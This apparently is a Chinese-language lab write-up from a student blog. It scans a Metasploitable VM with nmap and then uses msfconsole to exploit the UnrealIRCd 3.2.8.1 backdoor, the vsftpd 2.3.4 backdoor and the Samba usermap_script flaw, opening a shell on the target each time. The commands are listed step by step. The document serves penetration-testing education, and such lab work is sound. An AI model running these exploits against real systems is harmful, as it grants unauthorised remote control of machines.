2021-10-28 漏洞利用与远程控制

 一、实验题目:

        漏洞利用与远程控制
         


二、实验内容:

  1.使用nmap的【-A】参数对metasploitable进行强力扫描

  2.使用kali自带的msfconsole进行渗透测试与远程控制
           


三、环境准备:

  1.kali虚拟机(攻击者主机:192.168.112.130)

  2.Metasploitable靶机(目标主机:192.168.112.132)


四、实验步骤:

  1.使用ping命令测试连通性 

  2.打开终端,使用nmap的[-A]参数对metasploitable进行强力扫描

【命令】

nmap -A 192.168.112.132

   3.另外打开一个终端,对6667端口-irc_3281_backdoor 进行渗透复现

 【命令】

msfconsole                                                                      #打开msf控制台

search unreal_irc                                                            #搜索unreal_irc漏洞

use exploit/unix/irc/unreal_ircd_3281_backdoor      #使用unreal_ircd_3281_backdoor模块

show options                                                                   #显示模块所需参数

show payloads                                                                #显示payloads参数

set payload cmd/unix/bind_perl                                   #设置payload

set RHOSTS 192.168.112.132                                    #设置目标主机IP

exploit(或者run)                                                        #执行攻击

ifconfig                                                                             #查看目标主机IP

shell                                                                                 #打开目标主机终端

过程如下图:

  4.打开新的终端,对6200端口-vsftpd_234_backdoor进行渗透复现

【命令】

msfconsole                                                           #打开msf控制台

search vsftpd                                                        #搜索vsftpd漏洞

use exploit/unix/ftp/vsftpd_234_backdoor        #使用vsftpd_234_backdoor模块

show options                                                        #显示模块所需参数

set RHOSTS 192.168.112.132                          #设置目标主机IP

exploit(或者run)                                              #执行攻击

ifconfig                                                                   #查看目标主机IP

shell                                                                       #打开目标主机终端

 过程如下图:


  5.再次打开新的终端,对139端口--samba3.0漏洞进行渗透复现

【命令】

msfconsole                                            #打开msf控制台

search samba                                       #搜索samba漏洞

use multi/samba/usermap_script       #使用usermap_script模块

show options                                         #显示模块所需参数

set RHOSTS 192.168.112.132           #设置目标主机IP

exploit(或者run)                               #执行攻击

ifconfig                                                    #查看目标主机IP

shell                                                        #打开目标主机终端

过程如下图:

 

本文章供学习和参考!

欢迎各位感兴趣的小伙伴一起交流!

猜你喜欢

转载自blog.csdn.net/m0_58489132/article/details/121011866